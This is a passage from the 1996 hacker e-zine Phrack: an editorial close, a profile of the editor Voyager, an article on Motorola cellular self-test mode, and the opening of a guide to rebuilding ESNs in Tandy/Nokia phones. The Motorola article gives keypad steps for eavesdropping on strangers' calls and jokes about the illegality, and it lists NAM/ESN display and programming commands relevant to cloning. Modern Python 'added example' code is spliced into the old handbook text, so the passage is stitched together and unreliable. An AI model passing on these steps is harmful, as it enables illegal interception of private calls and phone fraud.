authors have gotten the money they deserve. I learned quite a bit from 
college; I paid quite a lot for college. But I have learned about hacking 
most of all from hackers. How can I repay those that have given me so much? 

We are rather fortunate to be in a position where we actually can give 
something back to them. We can give them a new generation of hackers that 
have the same opportunities to learn and to share their knowledge that we 
had. We can show them that we haven’t forgotten about where we started; we 
haven’t forgotten about why we are hackers; and we haven’t forgotten that 
to be a hacker is a passion, and it is something we are proud of. 

To my peers, consider giving something back to the community. To the next 
generation, learn from what we give and explore from what you learn; it will 
soon be your turn to take our place. And to those that made this all possible, 
to those that gave their own knowledge in the name of the community, the 
hundreds of authors, the ten editors, and most of all the readers: Thank You. 


--ReDragon 


Prophile on Voyager 


Personal 


Handle: Voyager 
Call him: Will 
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Date of Birth: 06/23/69 
Age: 27 
Height: 6’ 
Weight: 200lb 


Computers owned: 486DX4-100(FreeBSD), 486SX25(OS/2) and P-75 laptop (PC-DOS) 


How did this handle originate? I jumped on IRC one day and didn’t want 
to use my real handle, so I made this one up on the spur of the moment. 


How I Got Started 

I didn’t start hacking computers until I went to college. I taught 
myself to use PRIMOS and I started hacking because the 150k disk quota I 
was given wasn’t large enough for me to compile decent sized programs. 


I started hacking in ’87 and didn’t run into another hacker until ’91. 
I got Internet access and I found Phrack on ftp.eff.org. Wow! I 
thought, these people are serious. Shortly thereafter, I compiled the 
VMS client for IRC and I was talking to other hacker types on a regular 
basis. 


About that time, I put up a BBS. The system is now known as "Hacker’s 
Haven." The system has become fairly popular, with over 1,400 users 
surviving the last 90 day purge. 


In ’92, I wrote a "bot" in the IRC scripting language and called it 
"HackSrv." HackSrv distributed H/P files on demand and also opped all of 
us regular #hack cronies. 


Late in ’92 I moved to Atlanta and started organizing 2600 Meetings. We 
had a blast. We held them at my apartment. I can’t imagine what my 
neighbors thought. I still remember 40 people in my tiny living room 
huddled around the TV watching sneakers. One week, we were hacking on 
one terminal, IRC’ing on another, watching a lockpicking demo on the 
front door, sorting trash on the balcony, having firearms instruction in 
the bedroom, and setting off bottle rockets from the kitchen to the 
living room. The last is not a good idea, by the way. 


Over the course of the next few years, #hack went completely to hell. 

The place became littered with clueless newbies asking clueless newbie 
questions. Other people, usually even less clueful newbies, would kick 
and ban people for asking questions. This effectively stopped all useful 
conversation on #hack, as anyone who brought up a technical topic was 
likely to be kicked immediately. This led to a group of #hack ChanOp’s 
who had absolutely no technical knowledge and instead wasted away the 
hours stroking their egos. I was annoyed by the incredible cluelessness 
that had taken over the once fine channel and decided to do something 


Towards that end, I wrote the #hack FAQ. The #hack FAQ was to be given 
to new people to bring them up to speed in a short amount of time. This, 
I reasoned, would raise the intellectual level of conversation on #hack. 
It would also set the tone for conversation on #hack back to the technical 
atmosphere I had known just a few years earlier. Later, the #hack FAQ 
became the alt.2600/#hack FAQ and its purpose was expanded to cover 
the newsgroup alt.2600. 


In the Summer of ’94 I moved to Denver and joined up with TNO. TNO is a 
group of friends who share an avid interest in computer and telephone 
security. Today, TNO consists of Cavalier, DisordeR, Major, Edison and 
myself. 


Over the last few years, I’ve written for Phrack, 2600, CoTNo and FUCK. 
I’ve wanted to be Phrack editor since Taran King retired. When ErikB 
told me he was looking to retire from the job, and that I was being 
considered as the next Phrack editor, it hit me just how big of a 
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responsibility this was. I spoke with ReDragon (Editor of FEH) and 
daemon9 (Editor of The Infinity Concept). Together, we agreed to set 
aside our current e-zines (I was the current Editor of CoTNo) and focus 
all of our attention on Phrack. We have received offers of support from 
many Old and new people in the hacking community. I am looking forward 
to a bright future for Phrack. 


Interests 
Women: Sharp and quick 
Cars: Big and fast 
Food: Spicy to the point of pain 
Music: Rock and Roll 
Favorite performers: Jimmy Buffett, The Eagles 
Favorite author: Joel Rosenberg 
Favorite Book: Unix Power Tools 


Most Memorable Experiences 


KL kicking me off #hack for saying that hacking was wrong. 


Captain Hemp hiding my address and phone number in a bag of trash. 


Reading my first sniffer log. 


Getting arrested with Captain Hemp outside of a Southern Bell facility. 


Finding the switch with the unpassworded root account. 


Being pulled over on the way to HoHoCon while we were moshing in the 
van. 


DeadKat and Cavalier doing the root dance. 


Being followed by the security guard with the baby seat. 


Major and I *not* getting mugged and beaten by the gang of thieves, even 
though he could barely stand up and neither of us were carrying at the 
time. 


Some People To Mention 


Major 

You are, at the same time, one of the best people I have 
ever known and one of the worst people I have ever 
known. I am just glad I am on your side, and you mine. 
I trust you with my life, and with a few of the 
situations we’ve been through, that’s not just talking. 


Cavalier 

You taught us all what was important in a group. Your 
steadiness and common sense has helped carry TNO through 
the dark times. As always, I’m glad to have you here. 
You can always be counted on, and that means a great 
deal to me. 


The Presence 

It is always a pleasure to talk to you. You have taught 
me more than anyone else in the scene. You will always 
be one of the best. The strength of your ethics will 
guide you through where lesser men would fail. 


Captain Hemp 

There’s no one I’d rather be arrested with. 


NoCar / K 

Congratulations on your new system! 
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The Final Question 

I have met quite a few hackers. Very few have been "geeks" in the 
traditional sense of the term. I have met hacker business people, 
hacker jocks, hacker criminals, hacker stoners, hacker programmers, and 
hacker skater punks. It’s a sport for just about anyone with 
intelligence, dedication, and absolutely no respect for authority. 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 6 of 18 


Motorola Command Mode Information 


Written and typed up by Cherokee 


NOTE: The following text is only a few pages from an official Motorola 
handbook that I received, thanks to Obl. 


THIS IS NOT A COMPLETE HANDBOOK 


but it is very useful as a guide to learning how to use the self 
test instructions on the Motorola series of cellular phones. 


To actually enter the self test modes, THERE ARE SEVERAL STAGES 
BEFORE HAND THAT NEED TO BE DONE. They depend upon what type of 
Motorola mobile phone you possess. To my knowledge, the self test 
mode instructions are the same on every Motorola phone, the only 
difference will be how you enter the test mode. That I leave up to 
you to find out as there are lots of help files already out there, 
unless, there is a great demand for it. 


I will now show you how easy it is to use the test mode to your 
advantage. 


Say, you’re the average peeping Tom or Sally (what hacker isn’t?), 
this is how to listen in on other people’s mobile conversations. 


1.Enter the test mode. 

2.Turn the speaker on (08#) also called un-muting the receive audio. 
3.Tune into a channel (11xxxx#) (where x can range from 0 to 
600[TACS] and 1329 to 2047[ETACS].)... Although I’m not 100% sure 
of the channel mapping, (theres conversations in the range between 
600 to 1329), you’d do best to stick to playing around with these. 


You may have to try several different channels to pick up a 
conversation; not every channel is occupied with a user. I 
suggest you try 0 to 50, this is almost guaranteed to give you a 
result. BTW, it is actually illegal to monitor mobile 
communications without the consent of both parties, but hey, who’s 
going to know? :-) 


Displaying information - Some handsets only allow display of 1 line, 
and therefore you won’t be able to see all of the information being 
sent to you. There are 2 ways around this. 1. Go and get a 
handset which can display 2 lines of information. 2. Send the 
data to your computer to display on the screen; apparently the 
data is sent and received in an unfamiliar packet format, and will 
need to be decoded. 


FINAL NOTE: 

There are several conflicting sources for some commands, this is 
because of different versions of the ROM, so I’m putting all of 
the test codes bundled together in this file, and will update the 
list if there are any significant changes, or I find out about a 
new command in a later ROM version. 




Just one last final note to say hi to Davex[thanks for the NAM 
guide], Ratscabies, Maelstrom, Hi.T.Moonweed and Obl. 


Motorola Self Test Mode Instructions 
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INTRODUCTION 


Portable radio telephones are equipped for self-test, allowing service 
personnel to control and monitor radiotelephone functions via the 
telephone keypad. The self-test mode operates at two levels: 


1) a status display level, which allows the portable telephone to 
   operate normally while providing status indications in the display and; 

2) the service level, which removes the portable telephone from normal 
   service and allows commands to be entered through the keypad to 
   ‘manually’ control the operation of the radiotelephone. 


2. OPERATING PROCEDURES 


2.1 STATUS DISPLAY LEVEL OF SELF-TEST 


This level of self-test is entered by momentarily shorting pin 6 of J2 
to ground, while turning the radiotelephone on. The self-test mode can 
also be entered using the portable radiotelephone test kit (RTL4228A and 
RTL4229A). 


In this level of self-test mode the radiotelephone will place and 
receive calls as normal except the radiotelephone displays status 
information. The displayed status information alternates between the 
channel number and RSSI status information, and the primary status 
information (SAT frequency, carrier state, signaling tone state, power 
level, voice/data channel mode, and Rx and Tx audio states). The format 
and explanation of this status information is given in Table 1 under 02# 
Radio Status Request. 


When dialing a phone number, the display of the status information 
ceases when the first digit of the phone number is entered. When the 
Snd button (or End or Clr) is pressed, the status information display 
resumes. 
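The two display forms just described, decoded according to the 02# Radio Status Request entry in Table 1, as an added example (this is not code from the handbook or from the article's author; the sample readings are constructed):

```python
"""Decoder for the status strings a Motorola portable shows in self-test mode,
following the 02# Radio Status Request legend in Table 1.  Added example; not
part of the handbook excerpt or the original article."""

from dataclasses import dataclass

# SAT frequency codes from Table 1, display position C.
SAT_FREQ = {"0": "5970 Hz", "1": "6000 Hz", "2": "6030 Hz", "3": "No Lock"}


@dataclass(frozen=True)
class ChannelStatus:
    """The 'AAAA=BB' form: channel number (decimal) and RSSI reading."""
    channel: int
    rssi: int


@dataclass(frozen=True)
class PrimaryStatus:
    """The 'CDEFGHI' form: SAT, carrier, signaling tone, power, mode, mutes."""
    sat: str
    carrier_on: bool
    signaling_tone_on: bool
    power_level: int        # F: power level 0-7
    control_channel: bool   # G: 1=control channel, 0=voice channel
    rx_audio_muted: bool    # H: 1=muted
    tx_audio_muted: bool    # I: 1=muted


def parse_channel_status(text: str) -> ChannelStatus:
    """Parse 'AAAA=BB'.  Both fields are decimal digits; anything else is rejected."""
    left, sep, right = text.strip().partition("=")
    if sep != "=" or not left.isdigit() or not right.isdigit():
        raise ValueError(f"not an AAAA=BB display: {text!r}")
    return ChannelStatus(channel=int(left), rssi=int(right))


def _flag(ch: str, name: str) -> bool:
    """Table 1 flags are single binary digits; anything else is a misread."""
    if ch not in "01":
        raise ValueError(f"{name} must be 0 or 1, got {ch!r}")
    return ch == "1"


def parse_primary_status(text: str) -> PrimaryStatus:
    """Parse the seven-character 'CDEFGHI' display using the Table 1 legend."""
    s = text.strip()
    if len(s) != 7 or not s.isdigit():
        raise ValueError(f"not a CDEFGHI display: {text!r}")
    c, d, e, f, g, h, i = s
    if c not in SAT_FREQ:
        raise ValueError(f"unknown SAT code {c!r}")
    power = int(f)
    if power > 7:
        raise ValueError(f"power level out of range: {power}")
    return PrimaryStatus(
        sat=SAT_FREQ[c],
        carrier_on=_flag(d, "carrier"),
        signaling_tone_on=_flag(e, "signaling tone"),
        power_level=power,
        control_channel=_flag(g, "mode"),
        rx_audio_muted=_flag(h, "receive audio mute"),
        tx_audio_muted=_flag(i, "transmit audio mute"),
    )


def decode_display(text: str):
    """Dispatch on the form shown.  In the status display level the handset
    alternates between the two forms, so a reader of the display sees both."""
    return parse_channel_status(text) if "=" in text else parse_primary_status(text)


def describe(status) -> str:
    """One-line human-readable rendering of either decoded form."""
    if isinstance(status, ChannelStatus):
        return f"channel {status.channel}, RSSI {status.rssi}"
    on = lambda b: "ON" if b else "OFF"
    return (f"SAT {status.sat}; carrier {on(status.carrier_on)}; "
            f"ST {on(status.signaling_tone_on)}; power {status.power_level}; "
            f"{'control' if status.control_channel else 'voice'} channel; "
            f"Rx {'muted' if status.rx_audio_muted else 'open'}; "
            f"Tx {'muted' if status.tx_audio_muted else 'open'}")


if __name__ == "__main__":
    # Constructed sample readings, not taken from a real handset.
    for shown in ("0023=45", "1103010"):
        print(shown, "->", describe(decode_display(shown)))
```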
2.2 SERVICING LEVEL OF SELF-TEST 


The servicing level allows the servicing personnel to take control of 
the radio operation by entering the test commands through the telephone 
keypad. Such parameters as operating channel, output power level, 
muting, and data transmission can all be selected by entering the 
corresponding commands. The servicing level is entered from the status 
display level by pressing the (#) button. At this time the radio 
phones cease to function automatically in the radiotelephone system. 


NOTE 

While in the servicing level mode of self-test, the 
display does not alternate. Only the primary status 
information is displayed. 


Table 1 shows the test commands and the corresponding results. 


Table 1. Test Commands For Self-Test Mode


NOTES:

1. Each command consists of at least two digits entered from the telephone
   keypad with the entry terminated using the (#) key.
2. If the command relates to a test function with multiple data displays,
   the (#) key is used to pause at scanning data or to step through
   sequential test functions. Entering the (#) key during a pause time
   resumes scanning.
3. For commands that initiate an action that requires a response, or that
   accumulates error counts, the (#) key terminates the test.
Keypad Entry   Command Description        Status / Result Display
#              Enter Test Command Mode
01#            Restart                    (Re-enter DC power startup routine)
02#            Radio Status Request       AAAA=BB    AAAA = Channel Number (decimal)
                                                     BB = RSSI reading for channel
                                          CDEFGHI    C = SAT Frequency
                                                         0 = 5970 Hz
                                                         1 = 6000 Hz
                                                         2 = 6030 Hz
                                                         3 = No Lock
                                                     D = Carrier (1 = ON)
                                                     E = Signaling Tone (1 = ON)
                                                     F = Power Attenuation Level (0-7)
                                                     G = Mode (1 = control channel,
                                                               0 = voice channel)
                                                     H = Receive Audio Mute (1 = muted)
                                                     I = Transmit Audio Mute (1 = muted)
                                          When the radiotelephone is operating in the
                                          status display level of self-test, the
                                          information that is displayed alternates
                                          between AAAA=BB and CDEFGHI. In the servicing
                                          level of self-test, only the information
                                          designated by CDEFGHI is displayed.
03#            (NOT USED)
04#            Initialize Transceiver     Carrier = OFF
                                          Power Level = 0
                                          Receive Audio = MUTED
                                          Transmit Audio = MUTED
                                          Signaling Tone = OFF
                                          SAT = OFF
                                          DTMF & Audio Tones = OFF
                                          Audio Path = TO SPEAKER
05#            Carrier On                 Turn carrier on
06#            Carrier Off                Turn carrier off

NOTE: Use the PATH command (35A#) to select the audio path to test before
using commands 07# through 10#.

07#            Rx Mute                    Mute the receive audio
08#            Rx Un-mute                 Un-mute the receive audio
09#            Tx Mute                    Mute the transmit audio
10#            Tx Un-mute                 Un-mute the transmit audio
11ABCD#        Load Synth                 Load synthesizer with ABCD where ABCD =
                                          channel number in decimal (1329-2047, 0-600)
12A#           Set ATTN                   Set RF power attenuation to A where A =
                                          attenuation level (0-7; 0 = maximum power)
13#            RESET OFF                  This command should cause the Logic Unit to
                                          set WATCH DOG low and result in power-down of
                                          the radiotelephone.
14#            STON                       Transmit signaling tone 10 kHz
15#            STOFF                      Stop transmitting signaling tone 10 kHz
16#            SETUP                      Transmit a five word reverse control channel
                                          message; each of the five words will be
                                          "FF00AA55CC33". The transmitter de-keys at end
                                          of message.
17#            VOICE                      Transmit a two word reverse voice channel
                                          message; both words will be "FF00AA55CC33".
                                          The transmitter de-keys at end of message.
18#            SEND NAM                   AA = Address, BB = Data. Displays contents of
                                          NAM, one address at a time, advanced by
                                          pressing the (*) key. Note the address goes up
                                          to 1F.
19#            VERSION                    Displays software version number as
                                          "year, week".

NOTE: Entering commands 20# through 23# or 27# causes the transceiver to
begin a counting sequence or continuous transmission as described below.
In order to exit from the commands to enter another test command, the (#)
key must be depressed; all other key depressions are ineffectual.


20#            RCVS 1                     Receive control channel messages counting
                                          correctable and uncorrectable errors. When the
                                          command starts, the number of the command will
                                          be displayed in the right hand side of the
                                          display. Entering a # key will terminate the
                                          command and display two three-digit numbers in
                                          the display. The first number is the number of
                                          correctable errors and the second is the
                                          uncorrectable errors.
21#            RCVV 1                     Receive voice channel messages counting
                                          correctable and uncorrectable errors. The
                                          display and the # key termination are the same
                                          as for 20#.
22#            WSTS                       Receive control channel messages counting word
                                          sync sequences. When the command starts, the
                                          number of the command will be displayed in the
                                          right side of the display. Entering a # key
                                          will terminate the command and display the
                                          number of word sync sequences in the display.
23#            WSTV                       Receive voice channel messages counting word
                                          sync sequences. The display and the # key
                                          termination are the same as for 22#.
24#            (NOT USED)


25A#           SATON                      Enable the transmission of SAT where A = SAT
                                          frequency:
                                            A   SAT Freq.
                                            0   5970 Hz
                                            1   6000 Hz
                                            2   6030 Hz
26#            SATOFF                     Disable the transmission of SAT.
27#            TRANSMIT DATA              TX continuous control channel data.
32#            CLEAR                      Clears non-volatile memory. Clears all stored
                                          numbers.
33#            DTMF ON                    Turn DTMF on.
34#            DTMF OFF                   Turn DTMF off.
35#            DISPLAY RSSI               'D' series portable only.
35A#           SET AUDIO PATH             Where A = 1 Speaker, 2 Microphone,
                                          3 Earpiece.
38#            DISPLAY ESN                Displays ESN in four steps; hit * till back at
                                          start.

(The command numbers for the next six entries are illegible in the scan.)

               (NOT USED)
                                          Enables diversity.
                                          Disables diversity.
                                          Disables diversity.
                                          Disables diversity.
                                          Returns the RSSI reading taken on the current
                                          channel. The number is displayed as a three
                                          digit decimal number.


46#            (name illegible in the scan)
47A#           SET AUDIO LEVEL            Set audio level where A = level (0 = lowest,
                                          15 = highest). The normal level is 2.
                                          NOTE: Use 8 to 12 only for DTMF applications.
48#            SIDETONE ON                Enable sidetone (Command 05# must also be
                                          executed).
49#            SIDETONE OFF               Disable sidetone (Command 06# must also be
                                          executed).
50#            MAINN                      Not normally used. Tests data transmission/
                                          reception with transmit path connected
                                          externally to receive path. Maintenance data
                                          is transmitted and test results displayed:
                                          PASS = received data is correct.
                                          FAIL = 2-second timeout, no data received,
                                          or received data is incorrect.
51#            MAINL                      Tests data paths internal to the logic unit,
                                          where maintenance data is transmitted and
                                          looped back. Display is as follows:
                                          PASS = received data is correct.
                                          FAIL = 2-second timeout, no looped-back data,
                                          or looped-back data is incorrect.
52A#           (NOT USED)
53#            (NOT USED)
54#            (NOT USED)


55#            DISPLAY/PROGRAM NAM        Displays the contents of the NAM, one step at a
                                          time, advanced by depressing the (*) key. Only
                                          the last 7 digits of data are displayed. Refer
                                          to NAM programming instructions in this manual
                                          for programming details.

               The NAM steps are as follows (X = a digit shown on the display):

               01. 02051      - System ID number. Vodaphone=02051 Cellnet=03600
               02. XXXXXXXX   - A option byte (in binary)
                    Local use (bit A7): if set to 1 mobile will respond to local
                      control orders in the home area. Assigned by system operator.
                    Preferred system (bit A6): applies to units capable of operating
                      on two service systems. 0 = system B, 1 = system A
                    End-to-end signaling (bit A5): when enabled, indicates mobile is
                      equipped for DTMF via the keys after the landline connection
                      is made. 1 = enabled, 0 = disabled
                    Bit not used (bit A4)
                    Repertory (bit A3): indicates the mobile is equipped with
                      speed-dialing storage. 1 = enabled, 0 = disabled
                    Aux alert (bit A2): when enabled, user can place the mobile in
                      aux alert mode and be notified of incoming call via an aux
                      device. 1 = enabled, 0 = disabled
                    H/F auto mute (bit A1): when enabled, mobile will automatically
                      be in the mute mode when a call is made using the hands-free
                      mode. 1 = enabled, 0 = disabled
                    Minmark (bit A0): supplied by system operator; when enabled the
                      user's MIN2 will be sent with each call initiated or
                      answered. 1 = enabled, 0 = disabled
               03. XXXXXXXXXX - Mobile phone number
               04. XXXXXXXXXX - 10 digit MIN
               05. 17         - Station class mark
               06. 09         - Access overload class (15 highest priority)
               07. XXXXXX     - Security code
               08. XXX        - Lock code
               09. XXXXXXXX   - B option byte (in binary)
                    bit b7 not used
                    bit b6 not used
                    bit b5 not used
                    Extended field (bit b4): when enabled, the mobile would scan
                      more than 32 paging channels. Currently not used in UK.
                    Single system scan (bit b3): if set to 1 the mobile will scan
                      only 1 system based on the setting of option byte A bit 6.
                      1 = enabled, 0 = disabled
                    Auto recall (bit b2): this option allows the user to access
                      repertory by a 1 or 2 digit send sequence.
                      1 = enabled, 0 = disabled
                    Disable service levels (bit b1): if set to 1 service levels
                      couldn't be changed from the control unit.
                      0 = enabled, 1 = disabled
                    Lock code (bit b0): when enabled, allows the user to lock and
                      unlock the mobile using the three digit lock code.
                      0 = enabled, 1 = disabled
               10. XXXXXXXX   - C option byte (in binary)
                    User NAM programming (bit c7): when enabled allows user to
                      program NAM from handset. 0 = enabled, 1 = disabled
                    Single/Dual system (bit c6): 0 = single, 1 = dual
                    Call timer (bit c5): when enabled, the user can access the
                      call timer. 1 = disabled
                    Auto re-dial (bit c4): 0 = enabled, 1 = disabled
                    Speaker disable (bit c3): enable or disable handset speaker
                      when fitting hands free. 0 = enabled, 1 = disabled
                    Selectable system (bit c1): allows user to select primary
                      system. 0 = enabled, 1 = disabled
               11. XXXXXXXX   - D option byte (in binary)
                    Max volume (bit d7): sets max vol to step 4
                    Theft disable (bit d6): when set to 1, theft alarm is not
                      accessible.
                    Beeper disable (bit d5): 1 = disable
                    EXT DTMF (bit d4): when clear, DTMF is routed directly through
                      APC.
                    Flashing roam (bit d3): if enabled, roam light will flash when
                      home area roaming. 1 = enabled, 0 = disabled
                    Audio convenience (bit d2): if disabled, audio levels are
                      re-centered on power up. 0 = enabled, 1 = disabled
                    Time rx calls (bit d1): call timers will accumulate on incoming
                      calls when enabled. 1 = enabled, 0 = disabled
                    Charge rate (bit d0): when enabled, telephone will respond to
                      charge rate information. 1 = enabled, 0 = disabled
               12.            - Initial paging system. 0023=Vodaphone 0323=Cellnet
               13.            - Initial paging channel A
               14.            - Initial paging channel B
               15.            - Dedicated paging channels
               16. XXXXXXXX   - E option byte (in binary)
                    bit e7 not used
                    bit e6 not used
                    bit e5 not used
                    bit e4: transportable speaker present
                    bit e3 not used
                    bit e2 not used
                    bit e1 not used
                    Word sync scan disable (bit e0): portable use only

56#            (NOT USED)
57#            (NOT USED)
58#            COMPANDER ON               Turn compander ON
59#            COMPANDER OFF              Turn compander OFF
60# and 61#    (NOT USED)
61#            ESN TRANSFER               For series I or II and MINI TACS (probably
                                          Micro TACS).
62#            RNG-ON                     Turn the APC ringer audio path ON.
63#            RNG-OFF                    Turn the APC ringer audio path OFF.
64#            PLT-ON                     Turn the APC transmit pilot path on.
65#            PLT-OFF                    Turn the APC transmit pilot path off.
66# thru 71#   (NOT USED)
66#            IDENTITY TRANSFER          Series II and some current portables.
68#            DISPLAY FLEX AND MODEL INFO
69#            USED WITH IDENTITY TRANSFER
72#            MODULATION GAIN ADJUST     Refer to the Portable Telephone Phasing
                                          section for use of this command.
73#            POWER OUTPUT ADJUST        Refer to the Portable Telephone Phasing
                                          section for use of this command. (0 to 7.)
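
Added example (mine, not from the Motorola manual or from Phrack): a decoder
and encoder for the option bytes the 55# DISPLAY/PROGRAM NAM step shows as
eight binary digits, bit 7 first. It is written so the inconsistent bit
polarity in the listing above (1 = enabled for most bits, but 0 = enabled
for B bit 0 and for most of byte C) lives in one table instead of in the
technician's memory. The flag names are my own; bits the manual marks not
used, and C bits 2 and 0 which the scan does not describe, are omitted and
encode as 0.

```python
# Added example (not from the manual): decode/encode the NAM option bytes.
# Each entry is bit -> (flag name, bit value that the manual calls "enabled").
OPTION_BITS = {
    "A": {7: ("local_use", 1), 6: ("preferred_system_a", 1),
          5: ("end_to_end_signaling", 1), 3: ("repertory", 1),
          2: ("aux_alert", 1), 1: ("hf_auto_mute", 1), 0: ("minmark", 1)},
    "B": {4: ("extended_field", 1), 3: ("single_system_scan", 1),
          2: ("auto_recall", 1), 1: ("service_levels_locked", 1),
          0: ("lock_code", 0)},                      # 0 = enabled per manual
    "C": {7: ("user_nam_programming", 0), 6: ("dual_system", 1),
          5: ("call_timer", 0), 4: ("auto_redial", 0),
          3: ("handset_speaker", 0), 1: ("selectable_system", 0)},
    "D": {7: ("max_volume_step4", 1), 6: ("theft_alarm_hidden", 1),
          5: ("beeper_disabled", 1), 4: ("ext_dtmf", 1),
          3: ("flashing_roam", 1), 2: ("audio_convenience", 0),
          1: ("time_rx_calls", 1), 0: ("charge_rate", 1)},
    "E": {4: ("transportable_speaker", 1), 0: ("word_sync_scan_disable", 1)},
}


def decode_option_byte(name, digits):
    """Turn the eight-digit binary display string into {flag: enabled?}."""
    if name not in OPTION_BITS:
        raise ValueError("unknown option byte %r" % name)
    if len(digits) != 8 or set(digits) - {"0", "1"}:
        raise ValueError("option byte must be 8 binary digits: %r" % digits)
    value = int(digits, 2)                 # leftmost digit is bit 7
    flags = {}
    for bit, (flag, active) in OPTION_BITS[name].items():
        flags[flag] = ((value >> bit) & 1) == active
    return flags


def encode_option_byte(name, flags):
    """Inverse of decode: the string to key in for that NAM step.

    Flags not mentioned are written as disabled, which for the 0 = enabled
    bits means writing a 1; unused/undocumented bits are written as 0.
    """
    table = OPTION_BITS[name]
    known = {flag for flag, _ in table.values()}
    unknown = set(flags) - known
    if unknown:
        raise ValueError("no such flag in byte %s: %s" % (name, sorted(unknown)))
    value = 0
    for bit, (flag, active) in table.items():
        enabled = bool(flags.get(flag, False))
        value |= (active if enabled else 1 - active) << bit
    return format(value, "08b")


if __name__ == "__main__":
    # Constructed values, not from any real phone.
    print(decode_option_byte("B", "00000010"))
    print(encode_option_byte("C", {"dual_system": True}))   # 11111010
```

Note that an all-zero byte C is not "everything off": it enables user NAM
programming, the call timer, auto re-dial, the handset speaker and system
selection, which is why the encoder defaults those bits to 1.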
TANDY / RADIO SHACK CELLULAR PHONES


REBUILDING ELECTRONIC SERIAL NUMBERS AND OTHER DATA 


By Damien Thorn 


LEGAL CRAP 


(mandated by our cheap-suit, can't afford cigars, polyester-pants-wearing,
no-practice-having, almost dis-barred, old-fart legal counsel who only charges
us $20 / hour because he meant to retire when he was 70 but lived a few years
longer than he expected...hell, we love him!)


Contents copyright 1994, 1995 Phoenix Rising Communications. 
Software copyright 1993, 1994, 1995 as indicated. 


All Rights Reserved. Distribution of contents in hard-copy form is forbidden. 
Redistribution in electronic form is permitted only as outlined in the Phrack 
licensing agreement, provided this article is not segregated from the other 
editorial contents of Phrack #48. 


Use caution when rebuilding corrupt serial numbers, and avoid lending your 
talents to further the goals of unscrupulous people. 


Altering the serial number of a cellular transceiver is a violation of the 
FCC rules, and the U.S. Secret Service is charged with the responsibility 
of investigating fraudulent activity. 


All of this material was developed in-house and not provided or
endorsed by the manufacturer. Brand names and trademarks are used for
identification purposes only and are the property of their respective
owners. Use of same within this article definitely does not imply agreement
with or endorsement of the material presented, and probably aggravates them
to no end. There are no guarantees or warranties with regard to the accuracy
of this article. Although we've done the best job that we can, we may be
wrong. Happens all the time. If you damage a phone or inadvertently start
a global thermonuclear war, that's your problem. Don't come crying to us, or
make us fork over another twenty bucks to the old shyster. What you do with
this information is your responsibility.


INTRODUCTION 


While manufacturers publish service manuals for their cellular 
transceivers, they have an annoying habit of omitting certain 
data pertaining to memory devices and the arrangement of the data 
stored inside them. Since this stored information includes the 
electronic serial number (ESN), the lack of documentation can 
easily be excused as a way to avoid unwittingly facilitating 
fraud. 


The drawback to the 'security through obscurity' approach is that
service technicians who have a legitimate need to reprogram these
memory devices are unable to do so. The Nokia-designed
transceivers discussed in this article are an excellent example.
Since the ESN is stored in the same electrically-erasable
programmable read-only memory (EEPROM) device as the numeric
assignment module (NAM) information, corruption of the data can
be catastrophic to the operation of the phone.


Since the handset programming mode of these Nokia units actually
write-enables the memory device to store the alterable parameters,
an errant pulse from the microprocessor, dropped bits or supply 
voltages falling out of tolerance can cause the ESN or checksum 
to become overwritten or otherwise rendered useless. Should this 
occur, dealers have had little recourse but to ship the 
transceiver back to the factory for repair. Until now, that is. 


The goal of Phoenix Rising Communications in producing this
documentation is to empower technicians to do the job they have
been educated and hired to perform. This guide to Tandy and
Radio Shack cellular phones will enable the technician to rebuild the
corrupt data within this series of transceivers with confidence.


The information in this article was developed from the installed 
and transportable versions of the most commonly purchased phones 
from Radio Shack stores. These units were sold for many years, 
and finally replaced last year with a new, redesigned model. The 
data presented here can probably be applied to certain compatible 
Nokia transceivers as indicated later in the text. 


CHAPTER 1 


This publication is designed to provide supplemental information
to assist in the servicing of cellular mobile telephones
manufactured by Tandy Corporation under license from the Nokia Corporation.
It is not meant to be a replacement for the factory service manual.
Any shop needing to perform component level repairs should
definitely obtain the factory documentation from Tandy National
Parts.


Our primary goal is to explain the contents of the numeric 
assignment module, or NAM. In these particular phones, both the 
NAM parameters and the electronic serial number (ESN) are stored 
within the same electrically erasable programmable read-only 
memory (EEPROM) device. 


The problem inherent with this engineering decision is that the
ESN stored within this chip is not necessarily permanent. Since the
chip can be erased or reprogrammed, certain circumstances could
possibly cause the ESN to become corrupt. These include improper
signals from the microprocessor, induced currents or a power
interruption during NAM programming as the write cycle is taking
place.


Since the available service literature does not describe the
functions of this serial EEPROM or the data contained within,
service personnel would have to return the transceiver to the
manufacturer for service. This is not cost effective in terms of
time or money for either the shop or cellular customer.


Technicians who invest a little time to become familiar with the 
data stored within the NAM circuitry, including the placement of 
the ESN and checksum byte can service these types of problems 
in-house and with little difficulty. 


Basic instructions for peaking the transceiver’s RF sections have 
also been included herein as a convenience. While the phone is 
open and on the test bench, the customer’s transceiver should 
also be given a quick check for proper alignment. 


EQUIPMENT REQUIRED 


Other than basic hand tools, disassembly of the phone requires a
soldering iron with a medium sized tip and a vacuum de-soldering
tool. Good size solder removal braid may be used in conjunction
with, or in lieu of the de-soldering tool.


To correct data that has become corrupted within the EEPROM, a 
programming device is required capable of reading and burning an 
8-pin DIP integrated circuit. One such inexpensive device is 
listed in appendix III. 


An individual who is familiar with the memory device involved has
written a software program in the BASIC language to allow the
programming of this chip via the parallel port of an
IBM-compatible personal computer. The source code for this program
can be found in the appendix, and is provided as a reference only. Such
software is subject to the peculiarities of the host PC and
therefore cannot be recommended for use in place of a standard PROM
programmer. Older versions of GWBASIC are preferred to Microsoft's
current QBASIC interpreter.


MODELS COVERED 


The information presented is believed to cover all of the installed
and transportable (bag phone) cellular transceivers manufactured
by the Tandy Corporation under license from the Nokia Corporation up
until about a year ago.


Tests have been conducted on a random selection of these phones 
with manufacture dates ranging from 1989 through early 1994. All 
versions of the "TP" firmware through January, 1994 should be 
supported. 


Although no house-branded OEM Nokia transceivers have been
tested, we have surmised that this information is applicable to several
models based on the same or a similar design. These models
include the Nokia LX-11, M-11, M-10 and the Nokia-Mobira P4000 (PT612).
Some of these units, like the very old Radio Shack equivalents,
will require a service handset to program. More on that in the
next issue of Phrack.


HAND-HELD UNITS 


Only one of the hand-held cellular phones previously sold through
Radio Shack utilizes a discrete surface-mounted integrated
circuit to store the ESN and NAM parameters. If you have the capability
to read and program this SOIC 93C46 memory device you may be able to
extrapolate the PROM dumps in this guide to work with this phone.

Due to the difficulty in disassembling this unit and the delicate
nature of the surface-mounted EEPROM, the reader is cautioned
against attempting to service these in-house.


DISASSEMBLY

Prior to disassembling the transceiver, all antenna and cables,
including the handset, should be disconnected from the jacks on
the unit.

To aid in disassembly and component location, the original
hard-copy version of this publication contained several pages of
